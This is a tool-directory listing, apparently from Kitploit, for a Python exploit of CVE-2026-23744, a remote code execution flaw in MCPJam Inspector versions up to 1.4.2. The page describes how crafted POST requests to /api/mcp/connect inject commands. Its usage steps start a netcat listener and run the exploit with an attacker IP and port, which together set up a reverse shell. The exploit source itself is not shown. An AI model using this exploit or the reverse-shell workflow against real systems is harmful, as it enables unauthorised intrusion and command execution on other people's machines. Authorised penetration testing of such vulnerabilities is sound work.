Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-23744-RCE-for-MCPjam-inspector-v1.4.2 — Python exploit for CVE-2026-23744 achieving remote code execution via crafted POST requests to the /api/mcp/connect endpoint in MCPJam Inspector <= 1.4.2. | Kitploit
Tools/GitHubGitHub/srginebras/cve-2026-23744-rce-for-mcpjam-inspector-v1.4.2
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHubsrginebras/cve-2026-23744-rce-for-mcpjam-inspector-v1.4.2

CVE-2026-23744-RCE-for-MCPjam-inspector-v1.4.2

Python exploit for CVE-2026-23744 achieving remote code execution via crafted POST requests to the /api/mcp/connect endpoint in MCPJam Inspector <= 1.4.2.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
12 months agoNot yet reviewed

CVE-2026-23744-RCE-for-MCPjam-inspector-v1.4.2

A critical RCE vulnerability in MCPJam Inspector <= 1.4.2 is possible when the /api/mcp/connect endpoint listens on all network interfaces (0.0.0.0) by default and fails to properly sanitize user-supplied input passed to the command and args parameters in the serverConfig JSON object.

An attacker can exploit this vulnerability by sending a crafted POST request to /api/mcp/connect, achieving arbitrary command execution on the target system with the privileges of the MCPJam service.


USAGE

1.Install dependencies

root@kitploit:~
 pip install request

2.Start a listener with nc

root@kitploit:~
sudo nc -lvnp <port>

3.Start the exploit

root@kitploit:~
python3 CVE-2026-23744.py -u <url> -i <attacker-ip> -p <attacker-port>

4.For better usage I recomend to update the terminal to a fully funcional one , otherwise u wont be able to use commands like ctrl^c


Example

image image

Only use this exploit in controlled environments

⚠️Use at your own risk⚠️

Download Tool